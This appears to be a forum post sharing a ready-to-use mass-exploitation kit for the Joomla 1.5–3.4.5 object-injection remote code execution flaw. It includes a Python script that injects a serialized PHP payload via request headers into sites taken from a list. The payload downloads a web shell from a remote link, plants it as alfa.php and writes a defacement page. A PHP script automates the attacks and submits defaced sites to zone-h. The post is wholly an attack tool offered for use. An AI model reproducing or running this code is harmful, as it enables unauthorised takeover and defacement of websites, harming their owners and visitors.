Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
Today i will share with you the tools they called a priv8 to hack Joomla 1.5 to 3.4.5,
the original POC
here is the exploit python:
You need chance the index or shell , use txt format and chance alfa.html to you name .
Second part is the PHP Auto Zone-H Notify, you need chance your name to your zone-h name.
Today i will share with you the tools they called a priv8 to hack Joomla 1.5 to 3.4.5,
the original POC
here is the exploit python:
You need chance the index or shell , use txt format and chance alfa.html to you name .
Code:
import requests # easy_install requests
import sys
fil=open(sys.argv[1],"r")
def get_url(url, user_agent):
headers = {
'User-Agent': user_agent
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers,cookies=cookies)
return response.content
def php_str_noquotes(data):
"Convert string to chr(xx).chr(xx) for use in php"
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
def generate_payload(php_payload):
php_payload = "eval({0})".format(php_str_noquotes(php_payload))
terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
return exploit_template
pl = generate_payload("fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/alfa.php','w+'),file_get_contents('http://you shell link here.TXT')); fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/alfa.html','w+'),'Hacked By AlfabetoVirtual ');")
for i in fil.readlines():
try:
i=i.strip()
print get_url(i, pl)
lala=requests.get(i+"/alfa.html")
if "Hacked By AlfabetoVirtual" in lala.content:
z=open('Defaced-joomla-rce.txt','a')
z.write(i+"/alfa.html\n")
z.close()
except:
pass
fil.close()Second part is the PHP Auto Zone-H Notify, you need chance your name to your zone-h name.
PHP:
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
if(!isset($argv[1]))
{
die("usage: $argv[0] list.txt");
}
$list=file($argv[1]);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
function send_request_cgi($url,$fields,$ua)
{
$init=curl_init($url);
curl_setopt($init,CURLOPT_RETURNTRANSFER,1);
curl_setopt($init,CURLOPT_COOKIEJAR,"cookies.txt");
curl_setopt($init,CURLOPT_COOKIEFILE,"cookies.txt");
curl_setopt($init,CURLOPT_HEADER,1);
curl_setopt($init, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($init, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($init,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($init,CURLOPT_TIMEOUT,3);
curl_setopt($init,CURLOPT_CONNECTTIMEOUT,3);
curl_setopt($init,CURLOPT_USERAGENT,$ua);
$exe=curl_exec($init);
return $exe;
}
function get_payload($header)
{
$ka=trim(shell_exec("python rce.py"));
return $ka;
}
for($i=0;$i<count($list);$i++)
{
$site[$i]=strtok($list[$i],"\r\n");
$sites=trim($site[$i]);
echo $sites."\n";
$res=send_request_cgi($sites,"",get_payload("RHION"));
$res2=send_request_cgi($sites,"",get_payload("RHION"));
echo $res."\n".$res2;
$res=send_request_cgi($sites,"",get_payload("RHION"));
$res2=send_request_cgi($sites,"",get_payload("RHION"));
echo $res."\n".$res2;
$init1=file_get_contents("http://".$sites."/alfa.php");
if(preg_match("/AlfabetoVirtual/",$init1))
{
echo "SHELL: http://$sites/alfa.php\r\n";
$open=fopen("Defaced-joomla-rce.txt","a+");
fwrite($open,"http://$sites/alfa.php\r\n");
fclose($open);
}
$init2=file_get_contents("http://$sites/alfa.html") ;
if(preg_match("/Hacked/i",$init2))
{
echo "$sites/alfa.html defaced\r\n";
fwrite(fopen("defaced-Final.txt","a+"),"$sites/alfa.html\r\n");
// zone-h
$zone=curl_init("http://zone-h.org/notify/single");
curl_setopt($zone,CURLOPT_POST,1);
curl_setopt($zone,CURLOPT_POSTFIELDS,"defacer=AlfabetoVirtual&domain1=http://$sites/alfa.html&hackmode=1&reason=1");
curl_setopt($zone,CURLOPT_FOLLOWLOCATION,1);
$exez=curl_exec($zone);
if(preg_match("/OK/i",$exez))
{
echo $sites."/alfa.html zone-h ok :D\r\n";
}
else
{
echo $sites."/alfa.html zone-h error :(\r\n";
}
}
}
?>